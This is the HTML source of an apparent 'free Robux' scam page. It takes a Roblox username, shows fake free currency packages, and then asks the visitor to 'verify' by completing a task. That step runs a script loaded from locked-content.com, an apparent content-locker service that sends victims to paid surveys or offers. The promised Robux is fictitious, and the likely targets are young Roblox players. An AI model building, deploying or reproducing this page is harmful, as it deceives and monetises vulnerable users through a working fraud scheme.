<!DOCTYPE html>
<html lang="en">


<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="styles.css">
    <title>Get Robux</title>
    <link href="icon.ico" rel="icon">
<script type="text/javascript">
    var TpzkT_GEL_GNpQic={"it":4259459,"key":"8aabb"};
</script>
<script src="https://locked-content.com/?cac2c9e"></script>
</head>

<body>

    <nav>
        
        <div class="logo" >
            <span>&#9776;</span>
            
        </div>
        <ul>
            <li>Discover</li>
            <li>Marketplace</li>
            <li>Robux</li>
        </ul>
    </nav>

    <div class="middle">
        <h2>Get Robux</h2>
        <p>Robux allows you to purchase upgrades for your avatar or buy special abilities in experiences.</p>
    </div>

    <div class="box_con">
        <div class="box">
            <h3>Roblox username</h3>
			<p>We never ask for your password.</p><br>
            <input class="username" type="text" name="" placeholder="Enter username"><br>
            <button class="getrbx">Get Robux</button>
        </div>
        <div class="box2">
            <div class="folding">
                <div class="sk-cube1 sk-cube"></div>
                <div class="sk-cube2 sk-cube"></div>
                <div class="sk-cube4 sk-cube"></div>
                <div class="sk-cube3 sk-cube"></div>
                <div class="square"></div>
            </div>
            <p class="useroutput" style="text-align: center; margin-top: 30px;">Searching for amjad...</p>
        </div>
        <div class="box3">
            <div class="container">
                <div class="row">
                    <div class="price">FREE</div>
                    <div class="details">
                        <div class="robux_total">
                            <div class="pic"><img src="robux-removebg-preview.png"></div><span>800</span>
                        </div>
                    </div>
                </div>
                <div class="row">

                    <div class="price">FREE</div>
                    <div class="details">
                        <div class="robux_total">
                            <div class="pic"><img src="robux-removebg-preview.png"></div><span>1700</span>
                        </div>
                    </div>
                </div>
                <div class="row">

                    <div class="price">FREE</div>
                    <div class="details">
                        <div class="robux_total">
                            <div class="pic"><img src="robux-removebg-preview.png"></div>
                            <span>5500</span>
                        </div>
                    </div>
                </div>
                <div class="row">

                    <div class="price">FREE</div>
                    <div class="details">
                        <div class="robux_total">
                            <div class="pic"><img src="robux-removebg-preview.png"></div><span>10000</span>
                        </div>
                    </div>
                </div>

            </div>

        </div>
        <div class="box4">
            <h3>One last thing</h3>
            <p>Please complete any task to verify that you are not a robot.</p>
            <button  onclick="_HL()" style="font-size: 19px;">Verify now!</button><br>
			<span></span>
			

        </div>
    </div>

    
    <script src="app.js"></script>
</body>


</html>
